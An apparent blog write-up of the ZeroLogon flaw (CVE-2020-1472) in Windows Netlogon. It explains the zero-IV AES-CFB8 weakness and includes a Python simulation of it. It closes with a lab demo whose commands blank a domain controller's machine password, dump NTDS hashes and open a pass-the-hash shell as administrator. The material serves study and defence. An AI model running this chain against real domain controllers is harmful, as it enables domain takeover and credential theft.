ZeroLogon Exploit

CVE-2020-1472, 6 Oct 2020

Introduction

CVE-2020-1472 is an elevation-of-privilege vulnerability in the Netlogon Remote Protocol (MS-NRPC) that Microsoft fixed in the August 2020 security updates (KB4565349). It was found by Secura security researcher Tom Tervoort, who published the details on 11 September 2020. The weakness lies in how MS-NRPC uses AES in 8-bit Cipher Feedback mode (AES-CFB8) to compute the client credential from the client challenge in the third step of the authentication handshake. ZeroLogon affects every unpatched Windows server that acts as an Active Directory domain controller in an enterprise network.

The following diagram shows the MS-NRPC authentication handshake; the attack targets step 3, where the client credential is computed from the client challenge with AES-CFB8.

The way MS-NRPC uses AES-CFB8 has a problem with the initialisation vector (IV). The IV should be random for every encryption, but MS-NRPC hard-codes it to 16 zero bytes. In CFB8 each output byte is the plaintext byte XORed with the first byte of AES_k(shift register); the register then shifts one byte to the left and the new ciphertext byte enters on the right. With a zero IV and an all-zero client challenge the register starts as 16 zero bytes, so if the first byte of AES_k(0^16) happens to be 0x00 the first ciphertext byte is zero, the register stays all-zero, and every following byte is zero as well. That happens for about 1 in 256 session keys. Because the session key is derived from a fresh server challenge on every handshake and the DC does not rate-limit Netlogon authentication, an attacker who keeps sending an all-zero client challenge together with an all-zero client credential needs about 256 attempts on average before the step 4 validation passes. The attacker also clears the sign-and-seal flag during negotiation, so the rest of the session never requires the session key it does not know. The attack details are in the whitepaper by Tom Tervoort.
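The chaining property described above, as an added example that is not code from the original post or from Secura: a generic CFB8 implementation, the step 3 credential computation with the hard-coded zero IV, and a simulation of the attacker retrying the handshake until a session key whose first keystream byte is 0x00 turns up. Real AES from the `cryptography` package is used when it is installed; otherwise the block falls back to a clearly labelled SHA-256-based stand-in keyed block function (an assumption made so the block runs offline, not AES). CFB mode only ever runs the block cipher forward, so the chaining behaviour is the same either way. Session keys are random bytes from a seeded RNG rather than the output of the real Netlogon key derivation, and the simulated server checks only the step 4 credential, nothing else of the protocol.

```python
"""AES-CFB8 with a fixed all-zero IV: the weakness behind ZeroLogon (CVE-2020-1472).

Added example, not code from the original post or from Secura / Tom Tervoort.
Real AES is used when the 'cryptography' package is available; otherwise a
stand-in keyed block function built from SHA-256 is used (assumption: the
stand-in is NOT AES, but CFB only calls the block cipher forward, so the
chaining behaviour demonstrated here is identical).
"""
import hashlib
import random

BLOCK = 16
ZERO_IV = bytes(BLOCK)       # MS-NRPC hard-codes this IV: the bug
ZERO_CHALLENGE = bytes(8)    # attacker-chosen client challenge (8 bytes)

try:
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def block_encrypt(key: bytes, block: bytes) -> bytes:
        """Single-block AES encryption (ECB on exactly one block)."""
        enc = Cipher(algorithms.AES(key), modes.ECB(), backend=default_backend()).encryptor()
        return enc.update(block) + enc.finalize()
    CIPHER_NAME = "AES"
except ImportError:
    def block_encrypt(key: bytes, block: bytes) -> bytes:
        """Stand-in keyed block function (assumption, not AES)."""
        return hashlib.sha256(key + block).digest()[:BLOCK]
    CIPHER_NAME = "SHA-256 stand-in"


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Generic CFB8: out byte = in byte XOR first byte of E_k(register);
    the register then drops its left-most byte and appends the new ciphertext byte."""
    reg = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        c = p ^ block_encrypt(key, bytes(reg))[0]
        out.append(c)
        reg = reg[1:] + bytes([c])
    return bytes(out)


def cfb8_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """CFB8 decryption: same keystream, register fed with the ciphertext byte."""
    reg = bytearray(iv)
    out = bytearray()
    for c in ciphertext:
        out.append(c ^ block_encrypt(key, bytes(reg))[0])
        reg = reg[1:] + bytes([c])
    return bytes(out)


def compute_credential(session_key: bytes, challenge: bytes) -> bytes:
    """Handshake step 3: ClientCredential = CFB8(session_key, IV = 0, challenge)."""
    return cfb8_encrypt(session_key, ZERO_IV, challenge)


def zero_credential_possible(session_key: bytes) -> bool:
    """With IV = 0 and an all-zero challenge the register stays all-zero as long
    as every produced byte is 0, so the whole credential is zero exactly when the
    first byte of E_k(0^16) is 0x00: probability 1/256 per session key."""
    return block_encrypt(session_key, ZERO_IV)[0] == 0


def zerologon_attempts(seed: int, max_attempts: int = 20000):
    """Simulate the attacker re-running the handshake against a DC that derives a
    fresh session key each time (random here; the real KDF mixes in a fresh
    server challenge). The attacker always sends an all-zero challenge and an
    all-zero credential; the DC accepts in step 4 when its own computation
    matches. Returns (attempt_number, session_key) on success, else None."""
    rng = random.Random(seed)
    for attempt in range(1, max_attempts + 1):
        session_key = bytes(rng.getrandbits(8) for _ in range(BLOCK))  # unknown to attacker
        if compute_credential(session_key, ZERO_CHALLENGE) == bytes(8):
            return attempt, session_key
    return None


if __name__ == "__main__":
    result = zerologon_attempts(seed=2020)
    print(f"cipher: {CIPHER_NAME}")
    if result:
        n, k = result
        print(f"all-zero credential accepted after {n} handshake attempts")
        print("first keystream byte for that key:", block_encrypt(k, ZERO_IV)[0])
```

Note that the weakness is a property of the mode, not of AES: swapping the stand-in for real AES changes which keys hit, not the 1/256 rate, which is why a per-message random IV (or, as Microsoft's fix does, rejecting all-zero credentials and enforcing signed and sealed channels) is the only cure.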

Exploitation Demo

Many public PoC exploits have been released; this demo uses one of them.

Target Environment

Host Name: FKCLAI-WIN2016
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
Domain: FKCLAI.local
Logon Server: \\FKCLAI-WIN2016

Tools Setup

This demo uses RiskSense's ZeroLogon exploitation script together with the latest impacket.

Remove any previously installed impacket (for example the distribution package), so the PoC does not pick up an older version.

Install the latest impacket from https://github.com/SecureAuthCorp/impacket.git; the PoC builds its Netlogon calls on impacket's nrpc module.

Start Exploit

Set the DC machine account password to empty (arguments: DC NetBIOS name, DC IP). The script repeats the handshake with an all-zero client challenge until the DC accepts an all-zero credential, then calls NetrServerPasswordSet2 with an all-zero encrypted password:

python3 set_empty_pw.py fkclai-win2016 192.168.1.169

Dump NTDS through DRSUAPI replication as the machine account, which now authenticates with an empty password (press Enter at the password prompt). A DC machine account already holds the replication rights -just-dc needs:

secretsdump.py -just-dc administrator/fkclai-win2016\$@192.168.1.169

Use the dumped NT hash of the domain administrator for a pass-the-hash shell on the DC (the first half of -hashes is the standard empty LM hash):

wmiexec.py fkclai/administrator@192.168.1.169 -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

At this point the machine account password stored in Active Directory no longer matches the one the DC keeps in its own LSA, so the DC can no longer authenticate as itself to the domain; in a multi-DC environment that breaks replication and other secure-channel operations. Before leaving the lab, run a full secretsdump against the DC with the administrator hash to recover the original password (the local $MACHINE.ACC secret is printed as plain_password_hex) and restore it; the RiskSense repository ships a restore script for that purpose.
